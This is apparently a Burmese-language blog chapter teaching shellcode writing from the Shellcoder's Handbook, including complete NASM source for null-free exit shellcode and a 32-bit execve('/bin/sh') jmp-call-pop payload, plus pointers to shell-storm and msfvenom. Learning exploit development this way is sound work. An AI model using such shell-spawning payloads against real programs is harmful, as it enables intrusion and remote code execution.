0x06 – Shellcoding

ပထမဦးစွာ Shellcode Injection မလုပ်ခင် Shellcode တစ်ခုဘယ်လိုဖန်တီးလဲဆိုတာကို အရင်ဆုံး ကျနော်တို့လေ့လာကြတာပိုပြီးသင့်တော်မယ်လို့ထင်ပါတယ်။ သူများရေးပြီးသား Shellcode တွေရှိသလို Metasploit က msfvenom နဲ့ ကျနော်တို့ Shellcode ကို generate လုပ်လို့ရပါတယ်။ ဒါပေမဲ့ ကျနော်တို့မှာက လောလောဆယ် ဘာမှ inject စရာမရှိဘူး အဓိကလေ့လာဖို့ပဲဖြစ်တော့ ဒီလိုလုပ်လိုက်ရင်လွယ်တယ်ဆိုပေမဲ့ Shellcoding ကို နားလည်ထားရင်တော့ ပိုပြီးသင့်တော်လိမ့်မယ်လို့ တွေးမိပါတယ်
ဒါကြောင့် Shellcode တွေဟာ ဘာလဲ ? ကျနော်တို့ ဘယ်လိုရေးမလဲ သူများတွေဘယ်လိုရေးထားလဲဆိုတာကိုလေ့လာကြမယ်

အခန်း ၂ မှာ Writing Assembly ဆိုတဲ့ ခေါင်းစဉ်နဲ့ Assembly နဲ့ program ရေးတာလေး အခြေခံကို ကျနော်တို့လေ့လာပြီးပါပြီ အခုအခါ အလွယ်ဆုံးဖြစ်တဲ့ Exit program လေးကနေပဲစလေ့လာမှာပါ

ဒီအကြောင်းအရာတွေကို Shellcoder Handbook နဲ့ တခြား Online ကနေကျနော်ရှာဖတ်ထားတာဖြစ်ပါတယ်။

Exit with C

main() 
{
  exit(0);
}

ဒါကိုကျနော်တို့ Disassemble လုပ်ကြည့်မယ်။

Note * compile လုပ်တဲ့အခါမှာ static လုပ်ဖို့လိုပါတယ် dynamic linking လုပ်လိုက်တဲ့အခါမှာ ကြည့်ရတာအဆင်ပြေတော့မှာမဟုတ်လို့ပါ။

gcc -static -o exit exit.c

ဒီလိုဆို disassemble လုပ်ကြည့်မယ်

+15 မှာ eax ထဲကို 1 ထည့်တယ် eax = 1 က system calls exit ကို ခေါ်သုံးတယ်ဆိုတာ အခန်း ၂ မှာတုန်းက ကျနော်ရေးထားပြီးပါပြီ။ system call ကို အလုပ်လုပ်စေချင်ပြီဆိုရင် int $0x80 နဲ့ execute လုပ်တယ်ဆိုတာ လဲ ပြောခဲ့ပြီးပါပြီ ။ system call ref အနေနဲ့ ဒီဟာ လေးကမဆိုးဘူးလို့ထင်ပါတယ်။ မိမိကြိုက်နှစ်သက်ရာယူနိုင်ပါတယ်။ ဒီလိုဆိုရင် အခန်း ၂ တုန်းက assembly နဲ့ရေးထားခဲ့တဲ့ exit program လေးပြန်ကြည့်ရအောင်

.text

.globl _start

_start:
        movl $1,%eax
        movl $0,%ebx
        int $0x80

ကျနော်တို့ ဒီရေးထားတဲ့ assembly ကို object file ပြန်ထုတ်ဖို့အတွက် as assembler ကိုသုံးမယ် ပြီးရင်တော့ link လုပ်ပေးရမယ်

as -o exit.o exit.asm

ld -o exit_program exit.o

ဒါက exit လုပ်တယ်ဆိုတာ သိပြီးသားဖြစ်ပါတယ်။ ဒီလိုဆို ဒီကနေ shellcode ဘယ်လိုဖန်တီးမလဲ?

Memory Address နဲ့ Instruction တွေရဲ့ အလယ်မှာ OP Code လေးတွေတွေ့ပါလိမ့်မယ်။ ဒီလိုဆို OP code ဆိုတာဘာလဲပေါ့

Machine language, also called machine code, refers to instructions coded in patterns of bits (i.e., zeros and ones) that are directly readable and executable by a CPU

( ref 1 ) ( ref 2 )

ဒီ OP code တွေကလဲ CPU က execute လုပ်တယ်ဆိုတာကို ကျနော်တို့သိရပါတယ်။ ၄င်း op code မှ shellcode ကို ပြန်ဖန်တီးတာကတော့ မခက်ပါဘူး။

\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80

ဒီနေရာမှာ တစ်ခုသိထားရမှာက ကျနော်တိုက ဖန်တီးလိုက်တဲ့ shellcode က အလုပ်လုပ်ဦးမှာမဟုတ်ပါဘူး ဘာကြောင့်လဲဆိုရင် 0x00 ဆိုတဲ့ NULL character တွေပါနေတာတွေ့ရလိမ့်မယ် NULL character ဟာ web မှာဆိုရင်လဲ သူ့အနောက်က instruction  တွေကို အလုပ်မလုပ်စေတော့ဘူး ဒါကြောင့် NULL terminator လို့လဲခေါ်ကြတယ်။ ဒီတော့ ကျနော်တို့ Inject လုပ်လို့ရတဲ့ shellcode ကိုဖန်တီးဖို့လိုပါမယ်။ 0 တွေ instruction မှာပါနေတာမလို့ 0x00 တွေပါဝင်လာရခြင်းဖြစ်တယ်။ ဒီတော့ 0 တို့ 1 တို့ကို XOR (exclusive or) နဲ့ ကျနော်တို့ဖန်တီးလို့ရတယ်ဆိုတဲ့ trick လေးတွေကို သုံးကြတာကို လေ့လာရပါမယ်။ xor ဆိုတာ တူရင် 0 မတူရင် 1 လို့သိထားတယ်။ 0 လိုချင်ရင် တူတဲ့ ၂ ခုကို xor လုပ်ရမှာပေါ့။ ဒီတော့

xor ebx,ebx

ebx ကို xor လုပ်ပြီး ebx ထဲကိုထည့်လိုက်တယ်။ ဒီတော့ ebx ချင်းကတူတော့ ebx ထဲမှာ 0 ရောက်သွားတာပေါ့။

ebx ကတော့ဟုတ်ပြီ eax ထဲကိုကျ 1 ထည့်ရဦးမယ်။ eax မှာ 0 တွေမပါပဲနဲ့ ဘာလို့ 0x00 တွေဝင်လာသလဲဆိုတာလေးတစ်ချက် မေးစရာရှိပါတယ်။ ကျနော်တို့ခုလုပ်နေတာက 32 bit registers ပါ။ eax လို့ပြောလိုက်ရင် eax register ထဲမှာ အခန်းက ၄ ခန်းရှိတယ် ဒါပေမဲ့ ကျနော်တို့တကယ်တမ်း ထည့်တဲ့တန်ဖိုးက 1 တစ်ခုတည်းဆိုတော့ 1 bytes ပဲနေရာယူတယ် ။ အဲဒါကြောင့် ကျန်တဲ့လွတ်နေတဲ့နေရာတွေကို Null တွေဖြည့်ပစ်လိုက်တာဖြစ်တယ်။

eax သည် 32 bits အတွက်ဖြစ်တယ် 64 bit မှာဆို rax , 16 bit မှာဆိုရင် ax , 8 bit ဆိုရင် AL လို့ဖော်ပြကြတယ်။ ( ref ) ဒါကြောင့် ကျနော်တို့ 32 bits မလိုချင်ဘူး 8 bits ယူမယ်ဆိုတော့ AL ကိုသုံးလိုက်ရင် ခုနလိုပိုနေတဲ့နေရာတွေမှာ NULL ထဲတဲ့ပြသာနာက ကင်းဝေးသွားပါမယ်။

mov al,1

Final asm က အောက်ကလိုဖြစ်သွားမယ်

Section .text
  global _start
_start:
 xor ebx,ebx
 mov al,1
 int 0x80

ဒီတစ်ခါ assemble လုပ်မှာက as နဲ့မဟုတ်တော့ပါဘူး။ Exploit Development အတွက်ကျနော်လေ့လာခဲ့တဲ့စာတွေမှန်သမျှမှာလဲ as နဲ့မလုပ်ဘူး nasm Assembler ကိုပဲသုံးကြတယ်။ ဒါကြောင့်ကျနော်တို့လဲ အဲဒါနဲ့ပဲလုပ်တော့မယ်။

မရှိရင်တော့ Install လုပ်လိုက်ပေါ့ ။ Kali မှာတော့ ပါလာပြီးသားဖြစ်ပါတယ်။

apt-get install nasm

အောက်ကပုံလေးမှာကြည့်မယ်နော် လွယ်ပါတယ် -f ဆိုတာ format ကိုပြောတာပါ ELF ပဲထုတ်လိုက်မယ်

OP code လိုချင်တော့ objdump နဲ့ disass လုပ်ကြည့်မယ်

\x31\xdb\xb0\x01\xcd\x80

တိုလည်းတိုသွားတယ် NULL character တွေလဲမပါတော့ဘူး ဒါကို မစမ်းပြတော့ဘူး။ ဘာကြောင့်ဆို exit က exit လုပ်တာဆိုတော့ မသိသာဘူး ။ ဒါပေမဲ့ ရေးရတဲ့အကြောင်းကတော့ရှင်းတယ် ။ နားလည်လွယ်တဲ့ စလေ့လာလို့ကောင်းတဲ့ အရာမလို့ပါ။

Spawing a Shell

အဓိကအရေးကြီးတဲ့အခန်းက Shell ကို spawn လုပ်ဖို့ဖြစ်ပါတယ်။ ဒီလိုမှသာ ကျနော်တို့ RCE ( Remote Code Execution ) လုပ်လို့ရမှာဖြစ်ပါတယ်။ ဒါပေမဲ့လို့ exploit မှာ Local နဲ့ Remote ဆိုပြီးကွဲပါတယ်။ Local ကတော့ တခြား အားနည်းချက်တစ်ခုခုကနေ Shell access ရပြီးမှ Privilege Escalation လုပ်တဲ့နေရာတွေမှာ အများဆုံးတွေ့ရပါတယ်။ ဒါပေမဲ့လို့ ကျနော်တို့လေ့လာတာက Software Exploit ဖြစ်တဲ့အတွက် Kernel exploit တွေနဲ့မဆိုင်ပဲ app ရဲ့ permission နဲ့သာဆိုင်တယ်ဆိုတာ သိထားစေချင်ပါတယ်။ app မှာ root user access ပေးထားရင် ရမယ် မပေးထားရင်တော့ မရဘူးပေါ့။ Remote ကတော့ အဲဒီ Software ကိုယ်တိုင်က အားနည်းချက်ရှိတာမျိုးဖြစ်တဲ့အတွက် တခြား Exploit တစ်ခုခုမလိုပဲ ဒီ software ကြောင့်သာ RCE ရတယ်လို့မှတ်ထားသင့်ပါတယ်။

Shell ကိုလှမ်းခေါ်မယ်ဆိုတော့ ပထမဆုံး ကျနော်တို့ execute လုပ်တဲ့ System call တစ်ခုလိုမယ်ဗျ။ အဲဒီ system call မှ shell ကို execute လုပ်ပေးမှာဖြစ်တယ်။ ဟုတ်ပြီ ဒါကို ပထမတော့ ကျနော်တို့ C program နဲ့ပဲ အရင်စမ်းတာပေါ့။

#include <stdio.h>

int main() 
{
char **happy[2];
happy[0]="/bin/sh";
happy[1]=NULL;
execve(happy[0],happy,NULL);

}

exeve() system call အကြောင်း ဒီမှာ အသေးစိတ်ဖတ်လို့ပါတယ်။ first argument အနေနဲ့ execute လုပ်ချင်တဲ့ file ကိုထည့်ရတယ်ဆိုတော့ /bin/sh ကိုထည့်တာပါ။

execve() executes the program pointed to by filenamefilename must be either a binary executable

NULL တွေဘာကြောင့်ထည့်တာလဲ

Both argv and envp must be terminated by a null pointer. The argument vector and environment can be accessed by the called program’s main function, when it is defined as int main(int argc, char *argv[], char *envp[])

ဒီလိုဆို ခု ဒီ program က shell spawn ပေးလားမပေးလားစမ်းတာပေါ့

ဟုတ်ပြီ ။ ဒါဆို Shell spawn လုပ်တဲ့ process ကိုနားလည်ပြီ ။ ဒီလိုဆိုရင် အခုလုပ်ရမှာက Assembly နဲ့ ရေးရမှာဖြစ်ပါတယ်။ ဒီနေရာမှာနည်းနည်းတော့ရှုပ်မယ် ။ တတ်နိုင်သလောက်တော့ ပြန်ရေးပေးထားပါတယ်။

ပထမဆုံး system call execve က ဘာလဲဆိုတာသိဖို့လိုပါတယ်။ syscall ref

sys_execve	0x0b	char __user *	char __user *__user *	char __user *__user *	struct pt_regs *	-	arch/alpha/kernel/entry.S:925

အခုက အရင်လို့ 1 တွေ 0 တွေနဲ့မပြီးတော့ဘူး /bin/sh ဆိုတာကြီးကပါသေးတယ်။ ဒါကြောင့် အဲ့ string value တွေကို  hold လုပ်ထားဖို့လိုအပ်လာပါတယ် ။

GotoCall:
  Call Shellcode
  db '/bin/sh'

GotoCall ကနေမှာတစ်ဆင့် db Define byte ကိုသုံးပြီးကျနော်တို့ shellcode ဆီကို သွားမှာဖြစ်ပါတယ်။ ဒီတော့ အကြမ်းဖျင်း ဘယ်လိုဖြစ်မလဲ

Section .text
  global _start

start:
  jmp short GotoCall

shellcode:
  <shell_code>

GotoCall:
  Call shellcode
  db '/bin/sh'

main ကနေပဲစရမှာဆိုတော့ start ကိုသွားခိုင်းရတယ်။ ပြီးတော့မှ GotoCall ဆီကို jump လုပ်လိုက်တယ်။

GotoCall ထဲရောက်မှ shellcode ကိုပြန်ခေါ်တာဖြစ်တယ်။ ဒီနေရာမှာ တစ်ခုရှိသေးတာက execve က ဒီ argument တစ်ခုတည်းလိုတာမဟုတ်ပါဘူး။ နောက် ၂ခုရှိသေးတယ် မဟုတ်လား

အဲ့အတွက်ပါ db မှာတစ်ခါတည်းထည့်ပေးလိုက်မယ်။

  db '/bin/shJAAAAKKKK'

Shellcode အတွက်ဆက်လေ့လာမယ်

ကျနော်တို့ GotoCall ကနေ argument အနေနဲ့ထည့်ပေးလိုက်တဲ့ string က local variables ပဲဖြစ်တဲ့အတွက် stack ထဲကိုရောက်ပါတယ်။ ရှေ့ခန်းတွေတုန်းကပြောခဲ့တယ် stack ထဲက value ကိုပြန်ယူရင်တော့ pop နဲ့ယူရပါတယ်။

ဒီတော့ stack ထဲကဟာကို esi ထဲကိုအရင်ဆုံးထည့်လိုက်မယ်

pop esi

ဒီလိုဆို ESI ထဲမှာ ‘/bin/shJAAAAKKKK’ ရှိနေပြီ။

ပြီးရင် eax ထဲမှာ nulls ရောက်နေအောင် xor လုပ်လိုက်မယ်။

xor eax,eax

ပထမဆုံး argument အတွက် /bin/sh ပဲလိုတာ ဖြစ်တယ် ဒါကြောင့် ကျနော်တို့  နောက်ကဟာတွေကို terminate လုပ်ဖို့လိုတယ် J က placeholder ပဲဖြစ်တယ် သူ့နေရာက [esi+7] ဖြစ်တယ်။ eax တွေကို ခုနက xor လုပ်ပြီး null တွေနဲ့ဖြည့်ထားတာမလို့ al ထဲမှာ null တွေရှိနေတာဖြစ်ပါတယ်။ mov က copy လုပ်တယ်ဆိုတာ ပြောခဲ့ပြီးပါပြီ။ အဲ့တော့ J ဆိုတဲ့နေရာမှာ NULL ဖြစ်သွားပီ /bin/shNULL ဆိုပြီး terminate လုပ်လိုက်ခြင်းဖြစ်တယ်

mov byte [esi+7],al

esi ထဲမှာ ရှိနေတဲ့ ကျနော်တို့ string ရဲ့အစ ရှိတဲ့ address ကို ebx ထဲမှာ copy လုပ်လိုက်တယ်။

lea ebx, [esi]

ebx ထဲမှာသိမ်းထားတဲ့ value ကို  AAAA ရှိတဲ့နေရာမှာ copy လုပ်တယ် ။ ဘာလို့လဲဆိုရင် exceve() systemcall မှာ ဒုတိယ argument pointer ထည့်ရတာကြောင့်ပါ။ အဲ့တော့ အဲ့နေရာမှာ argument pointer အနေနဲ့ ESI ရဲ့အစ address ရှိနေမှာပေါ့။ အဲဒါက /bin/sh ရဲ့ pointer ပဲလေ။

mov long [esi+8],ebx

ပြီးတဲ့အခါ နောက်ဆုံး argument အတွက် pointer to NULL ဆိုတာကျန်သေးတယ်။

အဲဒါကို လဲ NULLဲဖြစ်အောင်ဆိုတော့ ခုန EAX ထဲမှာက NULL တွေရှိနေသးတယ် ။ ထည့်လိုက်မယ် အဲ့နေရာမှာ။

mov long [esi+12] ,eax

ဒီလိုဆို ESI ထဲမှာ ဘယ်လိုရှိနေပြီလဲ

[esi]
/bin/sh
NULL  -> [esi+7]
esi address -> argument pointer -> [esi+8]
NULL -> argument pointer to NULL -> [esi+12]

ခုဆိုရင် argument ၃ ခုလုံးအတွက် value တွေရှိနေပြီးပြီ။ eax မှာ system call ကို ခေါ်ရတော့မယ်

mov al,0x0b

နောက်ထပ် argument တွေက ebx , ecx ,edx အသီးသီးဖြစ်ကြတော့ ခုန ၃ ခုကို အဲ့ထဲတွေပြန်ရွှေ့မယ်။

mov ebx,esi
lea ecx,[esi+8]
lea edx,[esi+12]

ပြီးရင်တော့ system call ကို အလုပ်လုပ်တော့မယ်ဆိုတော့

int 0x80

ဒါဆိုရင် နောက်ဆုံး final asm ကအောက်ကလိုဖြစ်သွားမယ်

Section .text
  global _start

start:
  jmp short GotoCall

shellcode:
  pop esi
  xor eax , eax
  mov byte [esi+7],al
  lea ebx,[esi]
  mov long [esi+8],ebx
  mov long [esi+12],eax
  mov byte al,0x0b
  mov ebx,esi
  lea ecx , [esi+8]
  lea edx , [esi+12]
  int 0x80

GotoCall:
  Call shellcode
  db '/bin/shJAAAAKKKK'

ဒီလိုဆို assemble လုပ်ကြတာပေါ့။

nasm -f elf shell_spawn.asm
ld -o shell_spawn2 shell_spawn.o

OP code တွေရပြီ။

အခုရေးထားတဲ့အကြောင်းအရာတွေကိုတော့ ကျနော် Shellcoder Handbook အခန်း ၃ မှ လေ့လာပြီး ပြန်စမ်းပြီးရေးထားတာဖြစ်ပါတယ်။

Shellcoder Handbook

နောက်တစ်ခန်းကတော့ Shellcode Injection အကြောင်းဆက်ရေးပါမယ်။ ဒီဟာက နားလည်အောင်လေ့လာခြင်းသာဖြစ်ပါတယ်။

သူများရေးထားပြီးသားတွေ တစ်ပြုံကြီးတော့ရှိပါတယ်။

Shell storm

http://shell-storm.org/shellcode/

Metasploit နဲ့လဲ msfvenom ကိုသုံးလို့ရပါတယ်

နောက်ခန်းကြမှဆက်တာပေါ့

 

2 Comments

  1. Thanks For Sharing Bro.
    တစ်ပိုင်း တစ်ပိုင်းနဲ့ ရှင်းပြသွားတာ ကောင်းတယ် အကို။
    နောက် တစ်ပိုင်းဖြစ်တဲ့ Shellcode Injection ကိုလဲ စောင်မျှော်နေပါတယ်ဗျို့။
    နောက်ဆုံးတော့ Intel syntex နဲ့ စရေးပြီလေ 😛

    • ဟိဟိ Intel Syntax က ရေးရတာလွယ်တယ် 😀 ဟိုဟာက % တွေ $ တွေနဲ့ လက်ပေါက်ကပ်မှကပ်

Comments are closed.